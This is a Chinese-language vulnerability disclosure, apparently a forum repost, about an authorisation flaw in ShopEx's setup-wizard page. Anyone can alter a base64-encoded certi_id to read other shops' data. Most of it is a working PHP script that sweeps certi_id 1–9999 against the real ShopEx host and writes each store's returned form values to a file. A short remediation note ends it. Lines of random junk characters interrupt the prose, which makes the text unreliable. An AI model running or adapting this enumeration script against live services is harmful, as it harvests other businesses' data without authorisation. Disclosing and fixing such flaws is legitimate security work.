|
简要描述:
ShopEx 网店使用向导接口缺陷（certi_id 未做授权校验），可遍历所有使用了 ShopEx 程序的网站
详细说明:
问题出现在 ShopEx 网店使用向导页面（guide.ecos.shopex.cn/step2.php）
# U8 o( z; r* V& @
7 A' v( {, V1 r7 O+ i4 j. Z1 [7 N! K R4 f+ I- L8 _3 k6 K( H
示例 URL（refer 参数为 base64 字符串）: http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
1 R' j' o$ t* M6 ~) _' N
S6 q M0 b; q* B$ q3 f: n" i7 w+ S% f) C
) N% S9 W5 z" e5 ]! p: T+ V, W
refer 参数经 base64 解码（注意: base64 只是编码而非加密，任何人都可以解码并篡改后重新编码）后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
, C/ ~& \4 \2 k1 O% j8 R" I) V( Y* z, h4 m7 F
+ t1 r# `8 x$ f$ Y7 f% D; j# T; V5 H& {& U/ Q) y
我们只需修改 certi_id（一个顺序递增的整数 ID）并重新 base64 编码，即可遍历所有使用了 ShopEx 程序的网站——从现象看，服务端仅凭 refer 中的 certi_id 返回对应店铺的信息，未校验调用方是否有权访问该店铺，属于典型的不安全直接对象引用 (IDOR)。下面的脚本用于验证:
$ e5 D9 r3 C4 `' V( @; [
; Z- T {. O' u! W
' O+ V' z& B$ x8 }$ C( |
<?php

// Sweep certi_id 1..9999 and dump whatever step2.php returns for each one.
// NOTE(review): this fires ~10k unauthenticated requests at a third-party host
// with no delay between them — only run it against targets you are authorised
// to test.
$cid = 1;
while ($cid < 10000) {
    ShowshopExD($cid);
    $cid++;
}
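/**
 * Fetch the ShopEx setup-wizard page (step2.php) for one certi_id and record
 * every <input type="text"> name/value pair the response contains.
 *
 * The `refer` query parameter is plain base64 of a small JSON document — it is
 * neither encrypted nor signed — so the server accepts whatever certi_id we
 * put in it. That missing authorisation check is the defect being demonstrated.
 *
 * @param int    $cid     certi_id to request (cast with intval() to keep the JSON well-formed).
 * @param string $outfile file the name:value pairs are appended to.
 * @param int    $timeout seconds before curl gives up connecting/reading.
 * @return bool  true when the response echoed our refer and a hit was recorded,
 *               false on transport failure, no hit, or an unwritable $outfile.
 */
function ShowshopExD($cid, $outfile = 'c:/shopEx.txt', $timeout = 10) {
    $url   = 'http://guide.ecos.shopex.cn/step2.php';
    $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
    $url   = $url.'?refer='.$refer;

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
    // No timeout was set originally, so a single stalled request hung the whole sweep.
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);

    $result = curl_exec($ch);
    curl_close($ch);

    // curl_exec() returns false on transport failure; the original fed that
    // false straight into strpos()/preg_match_all().
    if ($result === false) {
        flush();
        return false;
    }

    $result = mb_convert_encoding($result, "gb2312", "UTF-8");

    // strpos() returns 0 when the needle sits at offset 0; the original's bare
    // truthiness test treated that as "not found". Compare against false explicitly.
    if (strpos($result, $refer) === false) {
        flush();
        return false;
    }

    $fp = fopen($outfile, 'ab'); // append, binary-safe
    if ($fp === false) {
        echo 'cannot open '.$outfile."\r\n";
        flush();
        return false;
    }

    preg_match_all('/<input\stype="text"(.*?)\/>/', $result, $value);

    foreach ($value[1] as $attrs) {
        // Skip inputs that lack a name or a value; indexing $res[1][0] on a
        // non-match raised notices and wrote bare ":" lines in the original.
        if (!preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/', trim($attrs), $res) || empty($res[1])) {
            continue;
        }
        $col = $res[1][0].':'.$res[3][0]."\r\n";
        echo $col;
        fwrite($fp, $col, strlen($col));
    }

    echo '--------------------------------'."\r\n";
    fclose($fp);
    flush();
    return true;
}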
, d6 t% U+ f# F! n1 s8 J3 @; r4 ]4 t, {: z$ C, t( e
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
修复建议: refer 参数换成其他加密方式。注意仅更换编码/加密方式属于治标——应使用服务端密钥签名或加密、不可被客户端篡改的 refer，并在 step2.php 中校验该 certi_id 是否属于当前调用方；否则编码一旦被还原，仍可按上述方式枚举。
* Q6 ^$ {) v. X0 z; _! v |
|